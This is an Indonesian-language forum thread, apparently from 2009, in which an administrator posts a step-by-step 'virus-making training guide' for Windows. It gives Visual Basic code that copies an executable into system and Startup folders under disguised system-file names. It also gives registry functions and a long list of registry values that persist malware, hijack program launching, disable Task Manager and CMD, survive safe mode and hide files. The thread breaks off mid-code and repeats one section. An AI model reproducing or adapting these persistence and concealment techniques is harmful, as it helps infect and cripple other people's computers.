.: MIG33PENAJAM.TK :.

Forum Komunitas Mig33 Penajam Paser Utara
 
IndeksPortalFAQPencarianAnggotaGroupPendaftaranLogin

Share | 
 

 Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
boystars
ADMINISTRATOR
ADMINISTRATOR


Male
Jumlah posting : 526
Lokasi : Penajam Kota tercinta. Petung Desa damai nan permai
Nick mig : boystars, dai4,ocal
Room : Masih sekitar Indonesia juga Very Happy

PostSubyek: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Mon 4 May 2009 - 0:08

.PANDUAN PELATIHAN PEMBUATAN VIRUS




Teman-teman yang mau berkreasi di dalam membuat virus...
Ayo kita bergabung disini...
Tapi satu pesan dari saya....
Tetap harus hati2 aja ya.....
Setiap kita membuat virus kita harus selalu waspada kalau2 nanti terjadi sesuatu ama komputer kita sendiri.....
.....Maksudnya Jaga Komputer anda sendiri dulu dengan benar-benar..

Thank's...
Kembali Ke Atas Go down
Lihat profil user http://www.mig33penajam.tk, www.rikie.co.cc
boystars
ADMINISTRATOR
ADMINISTRATOR


Male
Jumlah posting : 526
Lokasi : Penajam Kota tercinta. Petung Desa damai nan permai
Nick mig : boystars, dai4,ocal
Room : Masih sekitar Indonesia juga Very Happy

PostSubyek: Re: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Mon 4 May 2009 - 0:09

.INFEKSI SISTEM


Jika kita tanpa sengaja menjalankan/membangkitkan suatu virus (Virus
Komputer). Maka yang pasti dilakukan virus tersebut setelah bangkit
dari tidurnya adalah menginfeksi system yang ada pada computer target
agar virus tersebut melekat pada computer target. Sehingga meskipun
komputer tersebut telah di-restart virus tersebut akan tetap aktif
dikomputer target tersebut.

Cara kerja virus menginfeksi system:

  1. Melakukan penggandaan ke system.
    Langkah pertama sekali yang dilakukan oleh kebanyakan virus ketika user
    menjalankan virus dikomputernya adalah melakukan penggandaan kesistem
    user tersebut. Proses penggandaan ke system tersebut berfungsi agar virus
    tetap aktif pada saat computer direstart. Biasanya hasil penggandaan ke
    system mempunyai nama yang hampir dengan nama file system dan ada juga
    yang sama dengan nama file system hanya saja lokasi file tersebut berbeda
    dengan file aslinya. Contoh (winlogon.exe, lsass.exe, services.exe, csrss.exe,
    iexplorer.exe, shell.exe, dll).
  2. Menyeting registry.
    Setelah virus tersebut berhasil menggandakan dirinya kesistem barulah virus
    tersebut menggunakan registry sebagai benteng pertahanan. Kok
    menggunakan registry, seharusnya virus kan mampu melindungi dirinya sendiri
    tanpa bantuan registry? Benar, Tapi meskipun begitu banyak sekali
    kemungkinan virus tersebut dapat ditanggulangi oleh Antivirus atau software
    sejenisnya. Tapi dengan meminjam bantuan registry dari system operasi maka
    virus tersebut tersebut dapat melindungi dirinya dengan sangat baik.
    Dikarenakan kunci system operasi ada pada registry. Dengan bantuan registry
    ini virus mampu menjalankan dirinya kedalam mode safe-mode ataupun
    kedalam mode safe-mode dos sekalipun. Dan melalukan pengaturan agar virus
    tersebut tetap dalam keadaan tidak terlihat sehingga menyulitkan user untuk
    menghapus virus tersebut secara manual.
  3. Mengaktifkan virus yang telah berada disistem.
    Setelah virus telah melakukan penggandaan ke system dan menyeting registry
    maka yang dilakukan virus selanjutnya adalah menjalankan virus telah ada
    disistem sehingga meskipun flashdisk atau pun disket tersebut dikeluarkan
    maka virus tersebut akan tetap aktif
Kembali Ke Atas Go down
Lihat profil user http://www.mig33penajam.tk, www.rikie.co.cc
boystars
ADMINISTRATOR
ADMINISTRATOR


Male
Jumlah posting : 526
Lokasi : Penajam Kota tercinta. Petung Desa damai nan permai
Nick mig : boystars, dai4,ocal
Room : Masih sekitar Indonesia juga Very Happy

PostSubyek: Re: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Mon 4 May 2009 - 0:09

.PENGGANDAAN PADA SISTEM




Ketika virus dijalankan oleh seseorang maka virus tersebut akan mulai
melakukan aktivitasnya sebagai virus yaitu dengan melakukan penggandaan
ke system computer (Infeksi ke system). Hal ini dilakukan agar virus
tetap berada pada system meskipun sarana media penyebarannya telah
dilepas, virus tersebut akan tetap aktif dengan cara mengaktifkan virus
yang ter-copy di system sehingga system benarbenar telah terinfeksi
oleh virus.

Lokasi folder penggandaan virus pada system:

  1. Windows (Winnt untuk windows NT)
  2. System32 (System untuk windows 9x)
  3. Startup
  4. Application Data

Lokasi diatas biasanya yang paling sering digunakan oleh virus. Mengapa
harus lokasi tersebut? Karena untuk orang awam lokasi tersebut
merupakan lokasi dimana file nya tidak boleh dihapus, karena hampir
semua file yang ada pada folder tersebut merupakan file penting karena
jika terjadi penghapusan terhadap file diperlukan oleh windows maka
windows akan mengalami kerusakan. Dan hal ini dimanfaatkan oleh virus
untuk melindungi dirinya.
Kembali Ke Atas Go down
Lihat profil user http://www.mig33penajam.tk, www.rikie.co.cc
boystars
ADMINISTRATOR
ADMINISTRATOR


Male
Jumlah posting : 526
Lokasi : Penajam Kota tercinta. Petung Desa damai nan permai
Nick mig : boystars, dai4,ocal
Room : Masih sekitar Indonesia juga Very Happy

PostSubyek: Re: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Mon 4 May 2009 - 0:09

Selain lokasi folder virus juga melakukan perubahan extensi untuk menyamar
agar virus tersebut sulit dicari.

Extensi file yang sering digunakan oleh virus pada saat melakukan penggadaan pada system:

  1. EXE
  2. SCR
  3. COM
  4. PIF

Extensi diatas semuanya memiliki cara akses yang sama. Meskipun terjadi
perubahan extensi, virus tersebut tetap akan berjalan dengan normal.
SCR digunakan virus untuk menyamar sebagai Screen Saver sehingga virus
tersebut akan aktif jika Screen Saver aktif. Dan tentunya dengan
melakukan sedikit perubahan pada registry agar virus tersebut menjadi
Default pada Screen Saver.

Agar penyamaran sukses virus juga menggunakan penamaan yang hampir
sama dengan file system atau bahkan memang sama hanya saja lokasi file tersebut yang berbeda.

Penamaan file yang sering digunakan virus pada system:

  1. winlogon.exe
  2. lsass.exe
  3. services.exe
  4. csrss.exe
  5. smss.exe
  6. svchost.exe
  7. System
  8. taskmgr.exe
  9. explorer.exe
  10. iexplorer.exe
  11. notepad.exe
  12. winword.exe

Dengan menggunakan penamaan file seperti itu. Virus tersebut dapat membuat
bingung orang terserang virus tersebut karena mereka tidak tahu apakah
file tersebut benar-benar file system yang asli atau yang palsu (virus).

Penamaan file yang bermasalah pada task manager adalah winlogon.exe,
lsass.exe, services.exe, csrss.exe, smss.exe. Karena file tersebut justru akan
dilindungi oleh task manager sehingga tidak dapat matikan prosesnya oleh task
manager.

APA ADA PERTANYAAN????????????????
Kembali Ke Atas Go down
Lihat profil user http://www.mig33penajam.tk, www.rikie.co.cc
boystars
ADMINISTRATOR
ADMINISTRATOR


Male
Jumlah posting : 526
Lokasi : Penajam Kota tercinta. Petung Desa damai nan permai
Nick mig : boystars, dai4,ocal
Room : Masih sekitar Indonesia juga Very Happy

PostSubyek: Re: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Mon 4 May 2009 - 0:10

Berikut ini adalah kode sederhana untuk melakukan penggandaan ke system

Penggunaan perintah FileCopy:

FileCopy sumber,tujuan


Code:
Dim lokasi As String
Dim namafile As String
Private Sub Form_Load()
With App
lokasi = .Path & "\"
namafile = .EXEName & ".exe"
End With
FileCopy lokasi & namafile, "C:\virus.exe"
FileCopy lokasi & namafile, "C:\Windows\virus.com"
FileCopy lokasi & namafile, "C:\Windows\virus.pif"
FileCopy lokasi & namafile, "C:\Windows\System32\virus.scr"
End Sub
Kembali Ke Atas Go down
Lihat profil user http://www.mig33penajam.tk, www.rikie.co.cc
boystars
ADMINISTRATOR
ADMINISTRATOR


Male
Jumlah posting : 526
Lokasi : Penajam Kota tercinta. Petung Desa damai nan permai
Nick mig : boystars, dai4,ocal
Room : Masih sekitar Indonesia juga Very Happy

PostSubyek: Re: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Mon 4 May 2009 - 0:11

Dari perintah tersebut kita dapat mengetahui bahwa ketika virus
dijalankan maka virus tersebut akan melakukan penggandaan diri pada
drive C:


C:\virus.exe
C:\Window\virus.com
C:\Windows\virus.pif
C:\Windows\System32\virus.scr

----



Berikut ini adalah proses penggandaan dengan menggunkan perintah API:

Code:
Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long
Dim lokasi As String
Dim namafile As String
Private Sub Form_Load()
With App
lokasi = .Path & "\"
namafile = .EXEName & ".exe"
End With
CopyFile lokasi & namafile, "C:\virus.exe", 0
CopyFile lokasi & namafile, "C:\Windows\virus.com", 0
CopyFile lokasi & namafile, "C:\windows\virus.pif", 0
CopyFile lokasi & namafile, "C:\windows\system32\virus.scr", 0
End Sub


-------

Cara penggunaannya hampir sama. Jika kita penggunakan perintah API
berarti kita akan menggunakan perintah yang terhubung langsung dengan
Sistem Operasi, tetapi jika kita menggunakan perintah FileCopy itu
berarti kita menggunakan perintah yang telah disediakan oleh visual
basic. Setelah visual basic mengenal perintah perintah tersebut baru
visual basic akan mengirimkan perintah ke system operasi. Berikut ini
adalah kode penggandaan pada tempat-tempat yang dianggap penting oleh
Windows. Siapkan satu form dengan 5 buah command button dan satu buah
module.

Ketikan pada Form1:

Code:
Dim lokasi As String
Dim namafile As String
Dim tujuan As String
Private Sub Command1_Click()
tujuan = GetSpecialfolder(CSIDL_DESKTOP)
CopyFile lokasi & namafile, tujuan & "\" & "virus.exe", 0
MsgBox tujuan
End Sub
Private Sub Command2_Click()
tujuan = GetSpecialfolder(CSIDL_PERSONAL)
CopyFile lokasi & namafile, tujuan & "\" & "virus.exe", 0
MsgBox tujuan
End Sub
Private Sub Command3_Click()
tujuan = GetSpecialfolder(CSIDL_STARTUP)
CopyFile lokasi & namafile, tujuan & "\" & "virus.exe", 0
MsgBox tujuan
End Sub

Private Sub Command4_Click()
tujuan = GetWindowsPath
CopyFile lokasi & namafile, tujuan & "\" & "virus.exe", 0
MsgBox tujuan
End Sub
Private Sub Command5_Click()
tujuan = GetSystemPath
CopyFile lokasi & namafile, tujuan & "\" & "virus.exe", 0
MsgBox tujuan
End Sub
Private Sub Form_Load()
With App
lokasi = .Path & "\"
namafile = .EXEName & ".exe"
End With
End Sub



Berikut ini adalah kode sederhana untuk melakukan penggandaan ke system

Penggunaan perintah FileCopy:

FileCopy sumber,tujuan

Code:

Dim lokasi As String
Dim namafile As String
Private Sub Form_Load()
With App
lokasi = .Path & "\"
namafile = .EXEName & ".exe"
End With
FileCopy lokasi & namafile, "C:\virus.exe"
FileCopy lokasi & namafile, "C:\Windows\virus.com"
FileCopy lokasi & namafile, "C:\Windows\virus.pif"
FileCopy lokasi & namafile, "C:\Windows\System32\virus.scr"
End Sub

----

Dari perintah tersebut kita dapat mengetahui bahwa ketika virus
dijalankan maka virus tersebut akan melakukan penggandaan diri pada
drive C:

C:\virus.exe
C:\Window\virus.com
C:\Windows\virus.pif
C:\Windows\System32\virus.scr

----

Berikut ini adalah proses penggandaan dengan menggunkan perintah API:


Code:

Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long
Dim lokasi As String
Dim namafile As String
Private Sub Form_Load()
With App
lokasi = .Path & "\"
namafile = .EXEName & ".exe"
End With
CopyFile lokasi & namafile, "C:\virus.exe", 0
CopyFile lokasi & namafile, "C:\Windows\virus.com", 0
CopyFile lokasi & namafile, "C:\windows\virus.pif", 0
CopyFile lokasi & namafile, "C:\windows\system32\virus.scr", 0
End Sub

-------

Cara penggunaannya hampir sama. Jika kita penggunakan perintah API
berarti kita akan menggunakan perintah yang terhubung langsung dengan
Sistem Operasi, tetapi jika kita menggunakan perintah FileCopy itu
berarti kita menggunakan perintah yang telah disediakan oleh visual
basic. Setelah visual basic mengenal perintah perintah tersebut baru
visual basic akan mengirimkan perintah ke system operasi. Berikut ini
adalah kode penggandaan pada tempat-tempat yang dianggap penting oleh
Windows. Siapkan satu form dengan 5 buah command button dan satu buah
module.

Ketikan pada Form1:


Code:

Dim lokasi As String
Dim namafile As String
Dim tujuan As String
Private Sub Command1_Click()
tujuan = GetSpecialfolder(CSIDL_DESKTOP)
CopyFile lokasi & namafile, tujuan & "\" & "virus.exe", 0
MsgBox tujuan
End Sub
Private Sub Command2_Click()
tujuan = GetSpecialfolder(CSIDL_PERSONAL)
CopyFile lokasi & namafile, tujuan & "\" & "virus.exe", 0
MsgBox tujuan
End Sub
Private Sub Command3_Click()
tujuan = GetSpecialfolder(CSIDL_STARTUP)
CopyFile lokasi & namafile, tujuan & "\" & "virus.exe", 0
MsgBox tujuan
End Sub

Private Sub Command4_Click()
tujuan = GetWindowsPath
CopyFile lokasi & namafile, tujuan & "\" & "virus.exe", 0
MsgBox tujuan
End Sub
Private Sub Command5_Click()
tujuan = GetSystemPath
CopyFile lokasi & namafile, tujuan & "\" & "virus.exe", 0
MsgBox tujuan
End Sub
Private Sub Form_Load()
With App
lokasi = .Path & "\"
namafile = .EXEName & ".exe"
End With
End Sub

-----

Ketikan pada module:


Code:
Public Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long
Public Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" _
(ByVal hwndOwner As Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long
Public Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias _
"SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long
Public Declare Function GetSystemDirectory Lib "kernel32.dll" Alias _
"GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32.dll" Alias _
"GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function CreateDirectory Lib "kernel32" Alias _
"CreateDirectoryA" (ByVal lpPathName As String, _
lpSecurityAttributes As SECURITY_ATTRIBUTES) As Long
Public Type SHITEMID
cb As Long
abID As Byte
End Type
Public Type ITEMIDLIST
mkid As SHITEMID
End Type
Public Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Enum SFolder
CSIDL_DESKTOP = &H0 'menunjukkan folder virtual yang menyatakan root untuk
'semua namespace (/Desktop)
CSIDL_PROGRAMS = &H2 'menunjukkan folder sistem yang berisi grup program
'user (/Programs)
CSIDL_CONTROLS = &H3 'menunjukkan folder virtual yang berisi ikon-ikon
'aplikasi Control Panel (/Control Panel)
CSIDL_PRINTERS = &H4 'menunukkan folder virtual yang berisi printer-
'printer yang diinstall (/Printers)
CSIDL_PERSONAL = &H5 'menunjukkan folder sistem yang digunakan untuk
'menyimpan dokumen umum user (/My Document)
CSIDL_FAVORITES = &H6 'menunjukkan folder yang berisi item-item favorite
'user (/Favorites)
CSIDL_STARTUP = &H7 'menunjukkan folder yang berisi grup program StartUp
'user (/Startup)
CSIDL_RECENT = &H8 'menunjukkan folder sistem yang berisi dokumen-dokumen
'yang sering digunakan (/Recent)
CSIDL_SENDTO = &H9 'menunjukkan folder yang berisi item menu Send To
'(/Send To)
CSIDL_BITBUCKET = &HA 'menunjukkan folder sistem yang berisi objek file
'pada RecycleBin user (/Recycle Bin)
CSIDL_STARTMENU = &HB 'menunjukkan folder sistem yang berisi item-item
'menu Start (/StartMenu)
CSIDL_DESKTOPDIRECTORY = &H10 'menunjukkan folder sistem yang dapatkan
'digunakan untuk menyimpan objek file secara
'fisik pada desktop
CSIDL_DRIVES = &H11 'menunjukkan folder yang berisi segala sesuatu pada
'komputer lokal (/My Computer)
CSIDL_NETWORK = &H12 'menunjukkan folder yang berisi objek link yang
'kemungkinan ada pda folder virtual My Network Places
'(/My Network Places)
CSIDL_NETHOOD = &H13 'menunjukkan folder yang menyatakan root dari
'hierarki namespace network (/NetHood)
CSIDL_FONTS = &H14 'menunjukkan folder yang berisikan font (/FONT)
CSIDL_TEMPLATES = &H15 'menunjukkan folder yang digunakan untuk menyimpan
'dokumen template (/Template)
End Enum
'Get special folder
Public Function GetSpecialfolder(JenisFolder As SFolder) As String
Dim r As Long
Dim IDL As ITEMIDLIST
'get special folder
r = SHGetSpecialFolderLocation(100, JenisFolder, IDL)
If r = NOERROR Then
'create buffer
Path$ = Space$(512)
'Get path from IDList(IDL)
r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal Path$)
'Remove chr$(0)
GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) - 1)
Exit Function
End If
GetSpecialfolder = ""
End Function
'Get System Path
Public Function GetSystemPath() As String
On Error Resume Next
Dim Buffer As String * 255
Dim x As Long
x = GetSystemDirectory(Buffer, 255)
GetSystemPath = Left(Buffer, x) & "\"
End Function
'Get Windows Path
Public Function GetWindowsPath() As String
On Error Resume Next
Dim Buffer As String * 255
Dim x As Long
x = GetWindowsDirectory(Buffer, 255)
GetWindowsPath = Left(Buffer, x) & "\"
End Function


Dengan menggunakan perintah diatas kita dapat membuat kode untuk penggandaan
pada folder yang dianggap penting oleh windows...


udah mulai ngertikan ok aq anggap kalian ngerti.
Kembali Ke Atas Go down
Lihat profil user http://www.mig33penajam.tk, www.rikie.co.cc
boystars
ADMINISTRATOR
ADMINISTRATOR


Male
Jumlah posting : 526
Lokasi : Penajam Kota tercinta. Petung Desa damai nan permai
Nick mig : boystars, dai4,ocal
Room : Masih sekitar Indonesia juga Very Happy

PostSubyek: Re: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Mon 4 May 2009 - 0:11

.SETTING REGISTRY.




bos bos sekalian??? ceh ileh bahasa saya ok lanjut>>>

Kali ini kita akan membahas lebih dalam tentang bagaimana cara virus
menyeting registry. Dan settingan registry seperti apa yang biasa dilakukan virus.
Virus yang berjalan pada system operasi windows tak dapat lepas dari
bantuan registry yang dapat membuat virus tersebut mampu memiliki daya
tahan yang sangat kuat sehingga sulit sekali untuk dimusnahkan.
Registry dimanfaatkan virus sebagai suatu tameng atau benteng
pertahanan yang dapat melindunginya dari berbagai serangan-serangan
yang dapat membuat dirinya (virus) musnah dari computer yang telah
terinfeksi.
Misalkan kita telah berhasil mematikan suatu virus dengan menggunakan
program task manager ataupun program sejenisnya tanpa melakukan
pembersihan pada registry. Dimana virus telah memasang suatu kunci pada
registry yang akan mengaktifkan dirinya jika user menjalankan suatu
aplikasi, maka sudah bisa pastikan bahwa virus tersebut akan aktif
kembali.
Fungsi untuk menyeting registry yang digunakan oleh virus tidak banyak virus
hanya memerlukan suatu fungsi untuk membuat kunci (Biasanya DWORD dan
STRING)
dan menghapus suatu kunci resgitry (Biasanya jarang digunakan sih
hihihihihhuhuhuhhahahhaa seriuz dung mas boys ??ok lanjut).

Code Pembuatan Key DWORD Pada Registry:

Code:
Public Function CreateDwordValue(hKey As REG, Subkey As String, _
strValueName As String, dwordData As Long) As Long
On Error Resume Next
Dim ret As Long
‘Buka Key
RegCreateKey hKey, Subkey, ret
‘Buat Key Dword Value
CreateDwordValue = RegSetValueEx(ret, strValueName, 0, _
REG_DWORD, dwordData, 4)
‘Tutup Key
RegCloseKey ret
End Function


Code Pembuatan Key STRING Pada Registry:

Code:
Public Function CreateStringValue(hKey As REG, Subkey As String, _
RTypeStringValue As TypeStringValue, strValueName As String, _
strData As String) As Long
On Error Resume Next
Dim ret As Long
‘Buka Key
RegCreateKey hKey, Subkey, ret
‘Buat Key String Value
CreateStringValue = RegSetValueEx(ret, strValueName, 0, _
RTypeStringValue, ByVal strData, Len(strData))
‘Tutup Key
RegCloseKey ret
End Function


Code Penghapus Key:

Code:
Public Function DeleteKey(hKey As REG, Subkey As String) As Long
On Error Resume Next
Dim ret As Long
‘Buka Key
RegCreateKey hKey, Subkey, ret
'Hapus key
RegDeleteKey Result, ""
'Tutup handle
RegCloseKey Result
End Function
Kembali Ke Atas Go down
Lihat profil user http://www.mig33penajam.tk, www.rikie.co.cc
boystars
ADMINISTRATOR
ADMINISTRATOR


Male
Jumlah posting : 526
Lokasi : Penajam Kota tercinta. Petung Desa damai nan permai
Nick mig : boystars, dai4,ocal
Room : Masih sekitar Indonesia juga Very Happy

PostSubyek: Re: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Mon 4 May 2009 - 0:12

wah wah jari jemeri saya dah mulai keriting nih?? tapi gpp kitakan lg berbagi pengalaman. ok kita lanjut lagi>>



Macam-macam setingan registry yang dibuat virus:

1. Pada key Run.
Key ini digunakan virus agar virus aktif pada saat windows melakukan logon.
Contoh:

Code:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Jenis Nilai : String
Nama Kunci : Virus
Nilai : C:\Windows\Virus.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Jenis Kunci : String
Nama Kunci : Virus
Nilai : C:\Windows\Virus.exe


Penamaan suatu nama kunci dan nilai dapat anda ganti dan disesuaikan
dengan apa yang anda buat
2. Pada Key Explorer.
Key ini digunakan virus untuk melindungi dirinya agar tetap tersembunyi. Virus
dapat melakukan berbagai manipulasi explorer pada key ini.
Contoh:

Code:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Poli
cies\Explorer\
Jenis Nilai : DWORD
Nama Kunci : NoFolderOptions
Nilai : 1

3. Pada Key System.
Key ini juga digunakan virus untuk melindungi dirinya. Dengan key ini virus
dapat menonaktifkan TaskManager dan Registry.
Contoh:

Code:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Poli
cies\System\
Jenis Nilai : DWORD
Nama Kunci : DisableTaskMgr
Nilai : 1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\
Jenis Nilai: DWORD
Nama Kunci: DisableCMD
Nilai: 1

4. Pada Key Winlogon.
Key ini digunakan virus untuk mengaktifkan dirinya sebelum/sesudah tampilan
windows keluar.
Contoh:

Code:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon
Jenis Nilai : String
Nama Kunci : Shell
Nilai : Explorer.exe "C:\Windows\IExplorer.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon
Jenis Kunci : String
Nama Kunci : Userinit
Nilai :
C:\Windows\System32\userinit.exe,C:\Windows\IExplorer.exe

5. Pada Key Dekstop.
Key ini digunakan virus sebagai sarana penyamaran virus sebagai screen
saver sehingga pada screen saver berjalan bukan screen saver yang berjalan
tapi melainkan virus yang berjalan.
Contoh:

Code:
HKEY_CURRENT_USER\Control Panel\Desktop\
Jenis Kunci : String
Nama Kunci : SCRNSAVE.EXE
Nilai : C:\Windows\System32\virus.SCR"
HKEY_CURRENT_USER\Control Panel\Desktop\
Jenis Kunci : String
Nama Kunci : ScreenSaverIsSecure
Nilai : 0
HKEY_CURRENT_USER\Control Panel\Desktop
Jenis Kunci : String
Nama Kunci : ScreenSaveTimeOut
Nilai : 600

6. Pada Key AeDebug.
Key ini hampir sama seperti screen saver hanya saja, jika terjadi suatu debug
pada windows maka tanpa sadar windows telah menjalankan virus.
Contoh:

Code:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\AeDebug
Jenis Kunci : String
Nama Kunci : Debugger
Nilai : "C:\Windows\System32\Shell.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\AeDebug
Jenis Kunci : String
Nama Kunci : Auto
Nilai : 1

7. Pada Key Command.
Key ini digunakan virus agar virus selalu aktif. Fungsi pengaktifannya jika user
menjalankan suatu aplikasi maka yang dijalankan pertama kali adalah virus
baru virus tersebut akan menjalankan aplikasi tersebut agar tidak
mencurigakan. Dengan key ini virus memegang akses penuh terhadap suatu
aplikasi. Virus dapat menjalankan suatu apikasi yang dia jalankan atau pun
sebaliknya.
Contoh:

Code:
HKEY_CLASSES_ROOT\exefile\shell\open\command
Jenis Kunci : String
Nama Kunci :
Nilai : "C:\Windows\System32\shell.exe " "%1"%*
HKEY_CLASSES_ROOT\lnkfile\shell\open\command
Jenis Kunci : String
Nama Kunci :
Nilai : "C:\Windows\System32\shell.exe " "%1"%*
HKEY_CLASSES_ROOT\piffile\shell\open\command
Jenis Kunci : String
Nama Kunci :
Nilai : "C:\Windows\System32\shell.exe " "%1"%*
HKEY_CLASSES_ROOT\batfile\shell\open\command
Jenis Kunci : String
Nama Kunci :
Nilai : "C:\Windows\System32\shell.exe " "%1"%*
HKEY_CLASSES_ROOT\comfile\shell\open\command
Jenis Kunci : String
Nama Kunci :
Nilai : "C:\Windows\System32\shell.exe " "%1"%*
Ket Nama Kunci = Kosong artinya (Default).

8. Pada Key Safe Boot.
Key ini digunakan virus agar virus tetap aktif. Pada saat windows berjalan pada
mode safe-mode atau pun dos sehingga user tidak akan dapat menghapus
virus ini pada mode safe mode.
Contoh:

Code:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot
Jenis Kunci : String
Nama Kunci : AlternateShell
Nilai : C:\Windows\Virus.exe

9. Pada Key exefile.
Key ini digunakan virus untuk melakukan manipulasi file agar virus tersebut
tetap tersamar sehingga sulit untuk membedahkan mana file yang asli dan
mana yang virus.

Code:
HKEY_CLASSES_ROOT\exefile
Jenis Kunci : String
Nama Kunci :
Nilai : File Folder
Nama Kunci = Kosong artinya (Default).

10. Pada Key CabinetState.
Key ini digunakan virus sebagai suatu sarana yang dapat membantu
penyeberan jika user menggunakan windows explorer. Karena address bar
windows explorer akan menampilkan alamat file yang sedang dibuka oleh user
dengan lengkap.
Contoh:

Code:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Expl
orer\CabinetState
Jenis Kunci : DWORD
Nama Kunci : FullPathAddress
Nilai : 1

11. Pada Key Advanced.
Key ini digunakan virus untuk menyembunyikan dirinya. Agar settingan
windows explorer tetap tidak akan menampilkan file yang dalam keadaan
tersembunyi.

Code:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Expl
orer\Advanced\
Jenis Kunci : DWORD
Nama Kunci : HideFileExt
Nilai : 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Expl
orer\Advanced\
Jenis Kunci : DWORD
Nama Kunci : Hidden
Nilai : 0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Expl
orer\Advanced
Jenis Kunci : DWORD
Nama Kunci : ShowSuperHidden
Nilai : 0

12. jari jemari saya mo copot. bentar istirahat dulu mo ngerokok mo ngopi baru di lanjut

Anda dapat bereksplorasi lagi lebih banyak dengan registry agar dapat
membuat suatu benteng keamanan yang sangat bagus sehingga virus tersebut sulit untuk ditaklukan.
Kembali Ke Atas Go down
Lihat profil user http://www.mig33penajam.tk, www.rikie.co.cc
boystars
ADMINISTRATOR
ADMINISTRATOR


Male
Jumlah posting : 526
Lokasi : Penajam Kota tercinta. Petung Desa damai nan permai
Nick mig : boystars, dai4,ocal
Room : Masih sekitar Indonesia juga Very Happy

PostSubyek: Re: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Mon 4 May 2009 - 0:12

ngopi udah ngerokok udah sekarang apa lagi?????????

ok qm benar??????


ok lanjutkan


PENGAKTIFAN VIRUS PADA SISTEM


Jika virus telah melakukan penggandaan di system computer maka virus
tersebut akan mengaktifkan hasil penggandaannya yang telah berada disistem,
sehingga meskipun flashdisk atau pun media penyimpanan lainnya yang
digunakan sebagai suatu sarana penyebaran virus tersebut dilepas maka
virus tersebut akan tetap aktif.

Untuk melakukan pengaktifan virus yang telah berada pada system computer
virus tersebut hanya melakukan suatu perintah untuk menjalankan virus
yang berada di sisem computer tersebut dengan perintah Shell atau
dengan perintah ShellExecute.

Pangaktifan akan dilakukan bila terjadi suatu proses atau pemanggilan suatu
aplikasi. Virus biasanya akan memanggil dirinya kembali sehingga jika
salah virus dimatikan dari task manager maka virus yang prosesnya belum
dimatikan akan memanggilnya kembali. Jadi tehnik ini cukup menyulit
sesorang membunuh virus tersebut.
Kembali Ke Atas Go down
Lihat profil user http://www.mig33penajam.tk, www.rikie.co.cc
boystars
ADMINISTRATOR
ADMINISTRATOR


Male
Jumlah posting : 526
Lokasi : Penajam Kota tercinta. Petung Desa damai nan permai
Nick mig : boystars, dai4,ocal
Room : Masih sekitar Indonesia juga Very Happy

PostSubyek: Re: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Mon 4 May 2009 - 0:12

Code untuk melakukan pengaktifan:

Code:
Shell Lokasi+namafile,Window Style

Berikut ini adalah contoh sederhana:
Kamu siapkan terlebih dahulu satu buah command button.

Code:
Private Sub Command1_Click()
Dim lokasi As String, namafile As String
With App
lokasi = .Path & "\"
namafile = .EXEName
End With
Shell lokasi & namafile & ".exe", vbNormalFocus
End Sub

Jadi dengan perintah tersebut kita mampu menjalankan program apapun
termasuk juga virus. Extensi nggak masalah karena jika membuat suatu
file execute tanpa extensi, kita bisa menjalankannya dengan perintah
shell tapi jika menggunakan langsung double-click pada windows tidak
akan bisa.
Kembali Ke Atas Go down
Lihat profil user http://www.mig33penajam.tk, www.rikie.co.cc
boystars
ADMINISTRATOR
ADMINISTRATOR


Male
Jumlah posting : 526
Lokasi : Penajam Kota tercinta. Petung Desa damai nan permai
Nick mig : boystars, dai4,ocal
Room : Masih sekitar Indonesia juga Very Happy

PostSubyek: Re: Panduan Pelatihan Pembuatan Virus..BY. BOYSTARS   Mon 4 May 2009 - 0:13

Selanjutnya membuat suatu program yang tidak bisa ditutup dengan menge-click
tombol x pada windows:

Code:
Dim lokasi As String
